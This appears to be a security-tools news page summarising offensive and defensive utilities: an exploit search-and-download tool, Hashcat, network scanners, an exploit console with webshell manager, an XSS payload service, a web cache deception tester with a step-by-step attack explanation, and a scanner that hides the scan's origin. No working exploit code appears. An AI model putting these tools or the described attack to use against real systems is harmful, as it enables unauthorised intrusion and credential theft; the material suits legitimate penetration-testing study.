getsploit - Command line utility for searching and downloading exploits

Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB, Metasploit, Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.

Python version
Utility was tested on a python2.6, python2.7, python3.6. If you found any bugs, don't hesitate to open issue

How to use

Search

# git clone https://github.com/vulnersCom/getsploit
# cd getsploit
# ./getsploit.py wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
|          ID          |         Exploit Title          |                        URL                         |
+======================+================================+====================================================+
|  PACKETSTORM:141039  | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
|                      | PHP Code Injection             |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41308     | WordPress 4.7.0/4.7.1 Plugin   |     https://vulners.com/exploitdb/EDB-ID:41308     |
|                      | Insert PHP - PHP Code          |                                                    |
|                      | Injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41223     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41223     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection (PoC)                |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140893  | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
|                      | API Privilege Escalation       |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140902  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
|                      | Content Injection / Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140901  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
|                      | Content Injection Proof Of     |                                                    |
|                      | Concept                        |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41224     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41224     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection Arbitrary Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|      SSV-92637       | WordPress REST API content     |        https://vulners.com/seebug/SSV-92637        |
|                      | injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+

Save exploit files

# ./getsploit.py -m wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
|          ID          |         Exploit Title          |                        URL                         |
+======================+================================+====================================================+
|  PACKETSTORM:141039  | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
|                      | PHP Code Injection             |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41308     | WordPress 4.7.0/4.7.1 Plugin   |     https://vulners.com/exploitdb/EDB-ID:41308     |
|                      | Insert PHP - PHP Code          |                                                    |
|                      | Injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41223     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41223     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection (PoC)                |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140893  | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
|                      | API Privilege Escalation       |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140902  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
|                      | Content Injection / Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140901  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
|                      | Content Injection Proof Of     |                                                    |
|                      | Concept                        |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41224     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41224     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection Arbitrary Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|      SSV-92637       | WordPress REST API content     |        https://vulners.com/seebug/SSV-92637        |
|                      | injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+

# ls
LICENSE         README.md       getsploit.py    wordpress-470
# cd wordpress-470
# ls
edb-id41223.txt         edb-id41224.txt         edb-id41308.txt         packetstorm140893.txt   packetstorm140901.txt   packetstorm140902.txt   packetstorm141039.txt   ssv-92637.txt

Local database
If your Python supports sqlite3 lib(builtin) you can use --update and --local commands to download whole exploit database to your PC. After update you can perform local offline searches.

# ./getsploit.py --update
Downloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.
219642496/219642496 [100.00%]
Unpacking database.
Database download complete. Now you may search exploits using --local key './getsploit.py -l wordpress 4.7'

Download getsploit

Read More

Hashcat v3.6.0 - World's Fastest and Most Advanced Password Recovery Utility

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking.

Installation

Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

GPU Driver requirements:

• AMD GPUs on Windows require "AMD Radeon Software Crimson Edition" (15.12 or later)
• AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)
• Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
• Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"
• Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
• NVIDIA GPUs require "NVIDIA Driver" (367.x or later)

Features

• World's fastest password cracker
• World's first and only in-kernel rule engine
• Free
• Open-Source (MIT License)
• Multi-OS (Linux, Windows and OSX)
• Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)
• Multi-Hash (Cracking multiple hashes at the same time)
• Multi-Devices (Utilizing multiple devices in same system)
• Multi-Device-Types (Utilizing mixed device types in same system)
• Supports distributed cracking networks (using overlay)
• Supports interactive pause / resume
• Supports sessions
• Supports restore
• Supports reading password candidates from file and stdin
• Supports hex-salt and hex-charset
• Supports automatic performance tuning
• Supports automatic keyspace ordering markov-chains
• Built-in benchmarking system
• Integrated thermal watchdog
• 200+ Hash-types implemented with performance in mind
• ... and much more

Algorithms

• MD4
• MD5
• Half MD5 (left, mid, right)
• SHA1
• SHA-224
• SHA-256
• SHA-384
• SHA-512
• SHA-3 (Keccak)
• BLAKE2b-512
• SipHash
• Skip32
• RIPEMD-160
• Whirlpool
• DES (PT = $salt, key = $pass)
• 3DES (PT = $salt, key = $pass)
• ChaCha20
• GOST R 34.11-94
• GOST R 34.11-2012 (Streebog) 256-bit
• GOST R 34.11-2012 (Streebog) 512-bit
• md5($pass.$salt)
• md5($salt.$pass)
• md5(unicode($pass).$salt)
• md5($salt.unicode($pass))
• md5($salt.$pass.$salt)
• md5($salt.md5($pass))
• md5($salt.md5($salt.$pass))
• md5($salt.md5($pass.$salt))
• md5(md5($pass))
• md5(md5($pass).md5($salt))
• md5(strtoupper(md5($pass)))
• md5(sha1($pass))
• sha1($pass.$salt)
• sha1($salt.$pass)
• sha1(unicode($pass).$salt)
• sha1($salt.unicode($pass))
• sha1(sha1($pass))
• sha1($salt.sha1($pass))
• sha1(md5($pass))
• sha1($salt.$pass.$salt)
• sha1(CX)
• sha256($pass.$salt)
• sha256($salt.$pass)
• sha256(unicode($pass).$salt)
• sha256($salt.unicode($pass))
• sha512($pass.$salt)
• sha512($salt.$pass)
• sha512(unicode($pass).$salt)
• sha512($salt.unicode($pass))
• HMAC-MD5 (key = $pass)
• HMAC-MD5 (key = $salt)
• HMAC-SHA1 (key = $pass)
• HMAC-SHA1 (key = $salt)
• HMAC-SHA256 (key = $pass)
• HMAC-SHA256 (key = $salt)
• HMAC-SHA512 (key = $pass)
• HMAC-SHA512 (key = $salt)
• PBKDF2-HMAC-MD5
• PBKDF2-HMAC-SHA1
• PBKDF2-HMAC-SHA256
• PBKDF2-HMAC-SHA512
• MyBB
• phpBB3
• SMF (Simple Machines Forum)
• vBulletin
• IPB (Invision Power Board)
• WBB (Woltlab Burning Board)
• osCommerce
• xt:Commerce
• PrestaShop
• MediaWiki B type
• WordPress
• Drupal 7
• Joomla
• PHPS
• Django (SHA-1)
• Django (PBKDF2-SHA256)
• Episerver
• ColdFusion 10+
• Apache MD5-APR
• MySQL
• PostgreSQL
• MSSQL
• Oracle H: Type (Oracle 7+)
• Oracle S: Type (Oracle 11+)
• Oracle T: Type (Oracle 12+)
• Sybase
• hMailServer
• DNSSEC (NSEC3)
• IKE-PSK
• IPMI2 RAKP
• iSCSI CHAP
• CRAM-MD5
• MySQL CRAM (SHA1)
• PostgreSQL CRAM (MD5)
• SIP digest authentication (MD5)
• WPA
• WPA2
• NetNTLMv1
• NetNTLMv1+ESS
• NetNTLMv2
• Kerberos 5 AS-REQ Pre-Auth etype 23
• Kerberos 5 TGS-REP etype 23
• Netscape LDAP SHA/SSHA
• FileZilla Server
• LM
• NTLM
• Domain Cached Credentials (DCC), MS Cache
• Domain Cached Credentials 2 (DCC2), MS Cache 2
• DPAPI masterkey file v1 and v2
• MS-AzureSync PBKDF2-HMAC-SHA256
• descrypt
• bsdicrypt
• md5crypt
• sha256crypt
• sha512crypt
• bcrypt
• scrypt
• OSX v10.4
• OSX v10.5
• OSX v10.6
• OSX v10.7
• OSX v10.8
• OSX v10.9
• OSX v10.10
• iTunes backup < 10.0
• iTunes backup >= 10.0
• AIX {smd5}
• AIX {ssha1}
• AIX {ssha256}
• AIX {ssha512}
• Cisco-ASA MD5
• Cisco-PIX MD5
• Cisco-IOS $1$ (MD5)
• Cisco-IOS type 4 (SHA256)
• Cisco $8$ (PBKDF2-SHA256)
• Cisco $9$ (scrypt)
• Juniper IVE
• Juniper NetScreen/SSG (ScreenOS)
• Juniper/NetBSD sha1crypt
• Fortigate (FortiOS)
• Samsung Android Password/PIN
• Windows Phone 8+ PIN/password
• GRUB 2
• CRC32
• RACF
• Radmin2
• Redmine
• PunBB
• OpenCart
• Atlassian (PBKDF2-HMAC-SHA1)
• Citrix NetScaler
• SAP CODVN B (BCODE)
• SAP CODVN F/G (PASSCODE)
• SAP CODVN H (PWDSALTEDHASH) iSSHA-1
• PeopleSoft
• PeopleSoft PS_TOKEN
• Skype
• WinZip
• 7-Zip
• RAR3-hp
• RAR5
• AxCrypt
• AxCrypt in-memory SHA1
• PDF 1.1 - 1.3 (Acrobat 2 - 4)
• PDF 1.4 - 1.6 (Acrobat 5 - 8)
• PDF 1.7 Level 3 (Acrobat 9)
• PDF 1.7 Level 8 (Acrobat 10 - 11)
• MS Office <= 2003 MD5
• MS Office <= 2003 SHA1
• MS Office 2007
• MS Office 2010
• MS Office 2013
• Lotus Notes/Domino 5
• Lotus Notes/Domino 6
• Lotus Notes/Domino 8
• Bitcoin/Litecoin wallet.dat
• Blockchain, My Wallet
• Blockchain, My Wallet, V2
• 1Password, agilekeychain
• 1Password, cloudkeychain
• LastPass
• Password Safe v2
• Password Safe v3
• KeePass 1 (AES/Twofish) and KeePass 2 (AES)
• JKS Java Key Store Private Keys (SHA1)
• Ethereum Wallet, PBKDF2-HMAC-SHA256
• Ethereum Wallet, SCRYPT
• eCryptfs
• Android FDE <= 4.3
• Android FDE (Samsung DEK)
• TrueCrypt
• VeraCrypt
• LUKS
• Plaintext

Attack-Modes

• Straight ^*
• Combination
• Brute-force
• Hybrid dict + mask
• Hybrid mask + dict

^* accept Rules

Supported OpenCL runtimes

• AMD
• Apple
• Intel
• Mesa (Gallium)
• NVidia
• pocl

Supported OpenCL device types

• GPU
• CPU
• APU
• DSP
• FPGA
• Coprocessor

Download Hashcat

Read More

portSpider - A Lightning Fast Multithreaded Network Scanner Framework With Modules

A lightning fast multithreaded network scanner framework with modules.

modules:

• http - Scan for open HTTP ports, and get the the titles.
• mysql - Scan for open MySQL servers, and try to log in with the default credentials.
• mongodb - Scan for open MongoDB instances, and check if they are password protected.
• ssh - Scan for open SSH ports.
• printer - Scan for open printer ports and websites.
• gameserver - Scan for open game server ports.
• manual - Scan custom ports.

commands:

• modules - List all modules.
• use - Use a module.
• options - Show a module's options.
• set - Set an option.
• run - Run the selected module.
• back - Go back to menu.
• exit - Shut down portSpider.

installing:

Debian based systems:

$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

macOS / OSX:

$ brew install python3

$ git clone https://github.com/xdavidhu/portSpider

$ cd portSpider/

$ python3 -m pip install -r requirements.txt

NOTE: You need to have Homebrew installed before running the macOS/OSX installation.
WARNING: portSpider is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

developers:

• David Schütz (@xdavidhu)
• László Simonffy (@Letsgo00HUN) - Multithreading

Download portSpider

Read More

pwned - A command-line tool for querying the 'Have I been pwned?' service

A command-line tool for querying Troy Hunt's Have I been pwned? service using the hibp Node.js module.

Installation

npm install pwned -g

Usage

Usage: pwned [option | command]


Commands:

  ba [options] <account>   get all breaches for an account (username or email address)
  breaches [options]       get all breaches in the system
  breach [options] <name>  get a single breached site by breach name
  dc [options]             get all data classes in the system
  pa [options] <email>     get all pastes for an account (email address)

Each command has its own -h (--help) option.

Options:

  -h, --help     output usage information
  -v, --version  output the version number

Examples
Get all breaches for an account:

$ pwned ba pleasebeclean@fingerscrossed.tld
Good news — no pwnage found!

Get all breaches in the system, filtering results to just the 'adobe.com' domain:

$ pwned breaches -d adobe.com
-
  Title:       Adobe
  Name:        Adobe
  Domain:      adobe.com
  BreachDate:  2013-10-04
  AddedDate:   2013-12-04T00:00:00Z
  PwnCount:    152445165
  Description: In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, <em>encrypted</em> password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe-top100.txt" target="_blank">many were quickly resolved back to plain text</a>. The unencrypted hints also <a href="http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html" target="_blank">disclosed much about the passwords</a> adding further to the risk that hundreds of millions of Adobe customers already faced.
  DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
  IsVerified:  true
  IsSensitive: false
  IsActive:    true
  IsRetired:   false
  LogoType:    svg

Get a single breached site by breach name:

$ pwned breach MyCompany
No breach found by that name.

Get all the data classes in the system, returning raw JSON results for external/chained consumption:

$ pwned dc --raw
["Account balances","Age groups","Astrological signs","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Car ownership statuses","Career levels","Chat logs","Credit cards","Customer feedback","Customer interactions","Dates of birth","Device information","Device usage tracking data","Drinking habits","Drug habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Historical passwords","Home ownership statuses","Homepage URLs","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nicknames","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Personal descriptions","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political views","Private messages","Purchases","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Spoken languages","Time zones","Travel habits","User agent details","User statuses","User website URLs","Usernames","Website activity","Work habits","Years of birth"]

Get all pastes for an email address:

$ pwned pa nobody@nowhere.com
-
  Source:     Pastebin
  Id:         xyb8vavK
  Title:      null
  Date:       2015-06-01T00:16:46Z
  EmailCount: 8
-
  Source:     Pastebin
  Id:         DaaFj8Be
  Title:      CrackingCore - Redder04
  Date:       2015-04-05T22:22:39Z
  EmailCount: 116
-
  Source:     Pastebin
  Id:         9MAAgecd
  Title:      IPTV YabancÄą Combolist
  Date:       2015-02-07T15:21:00Z
  EmailCount: 244
-
  Source:     Pastebin
  Id:         QMx1dPUT
  Title:      null
  Date:       2015-02-02T20:45:00Z
  EmailCount: 6607
-
  Source:     Pastebin
  Id:         zUFSee4n
  Title:      nethingoez
  Date:       2015-01-21T15:13:00Z
  EmailCount: 312
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4560
  Title:      BuzzMachines.com 40k+
  Date:       null
  EmailCount: 36959
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4737
  Title:      PayPalSucks Database 102k
  Date:       null
  EmailCount: 82071

Download pwned

Read More

probeSniffer - A Tool for Sniffing Unencrypted Wireless Probe Requests from Devices

 ____  ____   ___  ____    ___ _________  ____ _____ _____  ___ ____    
|    \|    \ /   \|    \  /  _/ ___|    \|    |     |     |/  _|    \   
|  o  |  D  |     |  o  )/  [(   \_|  _  ||  ||   __|   __/  [_|  D  )  
|   _/|    /|  O  |     |    _\__  |  |  ||  ||  |_ |  |_|    _|    /   
|  |  |    \|     |  O  |   [_/  \ |  |  ||  ||   _]|   _|   [_|    \   
|  |  |  .  |     |     |     \    |  |  ||  ||  |  |  | |     |  .  \  
|__|  |__|\_|\___/|_____|_____|\___|__|__|____|__|  |__| |_____|__|\__| 
                                       v2.1 by David SchĂźtz (@xdavidhu)

A tool for sniffing unencrypted wireless probe requests from devices:

new in 2.1:

• Displaying the number of hosts
• Logging to SQLite database file
• Settable nickname for mac addresses
• Options to filter output by mac address
• Capturing 'boradcast' probe requests (without ssid)

requirements:

• Kali Linux / Raspbian with root privileges
• Python3 & PIP3 (probeSniffer will install the dependenices)
• A wireless card (capable for monitor mode) and one other internet connected interface (for vendor resolve)

options:

• -d / do not show duplicate requests
• -b / do not show broadcast requests
• -f / only show requests from the specified mac address
• --addnicks / add nicknames to mac addresses
• --flushnicks / flush nickname database
• --nosql / disable SQL logging completely
• --debug / turn debug mode on
• -h / display help menu

installing:

Kali Linux / Raspbian:

$ sudo apt-get update && sudo apt-get install python3 python3-pip -y

$ git clone https://github.com/xdavidhu/probeSniffer

$ cd probeSniffer/

$ python3 -m pip install -r requirements.txt

WARNING: probeSniffer is only compatible with Python 3.3 & 3.4 & 3.5 & 3.6

usage:
Make sure to put your interface into monitor mode before!

$ sudo python3 probeSniffer.py [monitor-mode-interface] [options]

Download probeSniffer

Read More

massExpConsole - Collection of Tools and Exploits with a CLI UI

Collection of Tools and Exploits with a CLI UI

What does it do?

• an easy-to-use user interface (cli)
• execute any adapted exploit with process-level concurrency
• crawler for baidu and zoomeye
• a simple webshell manager
• some built-in exploits (automated)
• more to come...

Requirements

• GNU/Linux or MacOS, WSL (Windows Subsystem Linux), fully tested under Kali Linux (Rolling, 2017), Ubuntu Linux (16.04 LTS) and Fedora 25 (it will work on other distros too as long as you have dealt with all deps)
• proxychains4 (in $PATH), used by exploiter, requires a working socks5 proxy (you can modify its config in mec.py)
• Java is required when using Java deserialization exploits, you might want to install openjdk-8-jre if you haven't installed it yet
• python packages (not complete, as some third-party scripts might need other deps as well):
  • requests
  • bs4
  • beautifulsoup4
  • html5lib
  • docopt
  • pip3 install on the go
• note that you have to install all the deps of your exploits or tools as well

Usage

• just run mec.py, if it complains about missing modules, install them
• if you want to add your own exploit script (or binary file, whatever):
  • cd exploits, mkdir <yourExploitDir>
  • your exploit should take the last argument passed to it as its target, dig into mec.py to know more
  • chmod 755 <exploitBin> to make sure it can be executed by current user
  • use attack command then m to select your custom exploit
• type help in the console to see all available features

Download massExpConsole

Read More

PhishingKitHunter - Find Phishing Kits Which Use Your Brand/Organization'S Files And Image

Find phishing kits which use your brand/organization's files and image.

PhishingKitHunter (or PKHunter) is a tool made for identifying phishing kits URLs used in phishing campains targeting your customers and using some of your own website files (as CSS, JS, ...). This tool - write in Python 3 - is based on the analysis of referer's URL which GET particular files on the legitimate website (as some style content) or redirect user after the phishing session. Log files (should) contains the referer URL where the user come from and where the phishing kit is deployed. PhishingKitHunter parse your logs file to identify particular and non-legitimate referers trying to get legitimate pages based on regular expressions you put into PhishingKitHunter's config file.

Features

• find URL where a phishing kit is deployed
• find if the phishing kit is still up and running
• generate a JSON report usefull for external usage
• use a hash of the phishing kit's page to identify the kit
• use a timestamp for history
• can use HTTP or SOCKS5 proxy

Usage

$ ./PhishingKitHunter-0.6.py -i LogFile2017.log -o PKHunter-report-20170502-013307.json -c conf/test.conf

  _ \  |  / |   |             |            
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |   
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|   

-= Phishing Kit Hunter - v0.6b =-

[+] http://badscam.org/includes/ap/?a=2
  |   Timestamp: 01/May/2017:13:00:03
  | HTTP status: can't connect (HTTP Error 404: Not Found)
[+] http://scamme.com/aple/985884e5b60732b1245fdfaf2a49cdfe/
  |   Timestamp: 01/May/2017:13:00:49
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://badscam-er.com/eb/?e=4
  |   Timestamp: 01/May/2017:13:01:06
  | HTTP status: can't connect (<urlopen error [Errno -2] Name or service not known>)
[+] http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/
  |   Timestamp: 01/May/2017:13:01:14
  | HTTP status: UP
  | HTTP shash : 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
[+] http://phish-other.eu/assur/big/phish/2be1c6afdbfc065c410d36ba88e7e4c9/
  |   Timestamp: 01/May/2017:13:01:15
  | HTTP status: UP
  | HTTP shash : 2a545c4d321e3b3cbb34af62e6e6fbfbdbc00a400bf70280cb00f4f6bb0eac44
697475it [06:41, 1208.14it/s]

Help

$ ./PhishingKitHunter-0.6.py --help

  _ \  |  / |   |             |            
 |   | ' /  |   | |   | __ \  __|  _ \  __|
 ___/  . \  ___ | |   | |   | |    __/ |   
_|    _|\_\_|  _|\__,_|_|  _|\__|\___|_|    

-= Phishing Kit Hunter - v0.6b =-

   -h --help   Prints this
   -i --ifile    Input logfile to analyse
   -o --ofile    Output JSON report file (default: ./PKHunter-report-'date'-'hour'.json)
   -c --config   Configuration file to use (default: ./conf/defaults.conf)

JSON report example

$ cat ./PKHunter-report-20170502-013307.json

{
    "PK_URL": "http://badscam.org/includes/ap/?a=2",
    "PK_info": {
        "Domain": "badscam.org",
        "HTTP_sha256": "",
        "HTTP_status": "can't connect (HTTP Error 404: Not Found)",
        "date": "01/May/2017:13:00:03"
    }
}{
    "PK_URL": "http://assur.cam.tech/scam/brand/new/2bd5a55bc5e768e530d8bda80a9b8593/",
    "PK_info": {
        "Domain": "assur.cam.tech",
        "HTTP_sha256": "0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091",
        "HTTP_status": "UP",
        "date": "01/May/2017:13:01:14"
    }
}
[...]

Requirements

• Python 3
• requests
• tqdm
• json
• PySocks

Install
Install the requirements

pip install -r requirements.txt

Configure
Please read the conf/default.conf file to learn how to configure PhishingKitHunter.

Download PhishingKitHunter

Read More

Airachnid Burp Extension - A Burp Extension to test applications for vulnerability to the Web Cache Deception attack

A Burp extension to test applications for vulnerability to the Web Cache Deception attack.

Once the extension has been loaded, it can be accessed in the Target - Sitemap tab and right click on the resource that should be tested. A context sensitive menu item called "Airachnid Web Cache Test" will be shown and can be used to conduct testing. If the resource is vulnerable, an Issue is created detailing the vulnerability.

The context sensitive menu item is also available for requests in the Proxy - Http History tab.

Installation

• Download the Airachnid.jar file.
• In Burp Suite open Extender tab. In Extensions tab, click Add button.
• Choose downloaded jar file -> Next.
• Check installation for no error messages.

Vulnerability

In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).

The Web Cache Deception attack could be devastating in consequences, but is very simple to execute:

1. Attacker coerces victim to open a link on the valid application server containing the payload.
2. Attacker opens newly cached page on the server using the same link, to see the exact same page as the victim.

** Of course, this attack only makes sense when the vulnerable resource available to the attacker returns sensitive data.
The attack depends on a very specific set of circumstances to make the application vulnerable: 1. The application only reads the first part of the URL to determine the resource to return.
If the victim requests:

https://www.example.com/my_profile

The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for

https://www.example.com/my_profile_test

It would still return the profile page of the victim, disregarding the added text. The same applies for other URL like

https://www.example.com/my_profile/test

2. The application stack caches resources according to their file extensions, rather than by cache header values. If the application stack has been configured to cache image files. It will cache all resources with .jpg .png or .gif extensions. That means that e.g. the image at

https://www.example.com/images/dog.jpg

Would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are retrieved from cache, responding with the same resource that was initially cached (for as long as the cache timeout is set).

Attack
These preconditions can be exploited for the Web Cache Deception attack in the following manner:

Step 1: An attacker entices the victim to open a maliciously crafted link:
  https://www.example.com/my_profile/test.jpg

• The application ignores the 'test.jpg' part of the URL, the victim profile page is loaded.
• The caching mechanism identifies the resource as an image, caching it.  

Step 2: The attacker sends a GET request for the cached page:
https://www.example.com/my_profile/test.jpg

• The cached resource, which is in fact the victim profile page is returned to the attacker (and to anyone else requesting it).

Download Airachnid Burp Extension

Read More

XSS'OR - Hack with JavaScript

XSS'OR is a free online tool for hacking with JavaScript.

It contains three major modules:
1. Encode/Decode
The Encode/Decode module, including:

• front-end encryption and decryption;
• code compression, decompression, beautification, the implementation of testing;
• character set conversion, hash generation;
• and so on.

2. Codz

The Code module, including:

• CSRF request code generation;
• AJAX request code generation;
• XSS attack Vector;
• XSS attack Payload;
• and so on.

3. Probe

The Probe module, in order to balance, it is the most basic probe, and each IP can generate a unique probe every day. You can use this probe to attack test (such as: XSS, phishing attacks, etc.). The probe can get the basic information of the target user, and you can dynamically inject more commands (JavaScript Codz) for “remote control” testing.

Some user experience and privacy considerations:

XSS'OR, even if your browser is accidentally closed or crashed, your records will not be lost, because the relevant records are cached to your browser local. The server will not store any of your privacy, except for the result record of the probe (only the result record) will be temporarily cached, because the design considerations, but these will be automatically cleared every day.

Try XSS'OR

Read More

scanless - Public Port Scan Scrapper

Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you'd like to run a port scan on a host and have it not come from your IP address.

scanless (adj): lacking respectable morals. That girl is scanless!

Public Port Scanners

• yougetsignal
• viewdns
• hackertarget
• ipfingerprints
• pingeu

Usage
Requires the requests and bs4 libraries to run, install with pip.

$ python scanless.py --help
usage: scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]

scanless, public port scan scrapper

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        ip or domain to scan
  -s SCANNER, --scanner SCANNER
                        scanner to use (default: yougetsignal)
  -l, --list            list scanners
  -a, --all             use all the scanners

$ python scanless.py --list
Scanner Name   | Website
---------------|------------------------------
yougetsignal   | http://www.yougetsignal.com
viewdns        | http://viewdns.info
hackertarget   | https://hackertarget.com
ipfingerprints | http://www.ipfingerprints.com
pingeu         | http://ping.eu

$ python scanless.py -s viewdns -t scanme.nmap.org
Running scanless...

------- viewdns -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
1521/tcp closed oracle
3306/tcp closed mysql
3389/tcp closed rdp
-----------------------

$ python scanless.py -a -t scanme.nmap.org
Running scanless...

------- yougetsignal -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
115/tcp  closed sftp
135/tcp  closed msrpc
139/tcp  closed netbios
143/tcp  closed imap
194/tcp  closed irc
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
3306/tcp closed mysql
3389/tcp closed rdp
5632/tcp closed pcanywhere
5900/tcp closed vnc
6112/tcp closed wc3
----------------------------

------- viewdns -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
1521/tcp closed oracle
3306/tcp closed mysql
3389/tcp closed rdp
-----------------------

------- hackertarget -------
tarting Nmap 7.01 ( https://nmap.org ) at 2017-05-06 02:31 UTC
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.065s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   open   ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http          Apache httpd 2.4.7 ((Ubuntu))
110/tcp  closed pop3
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

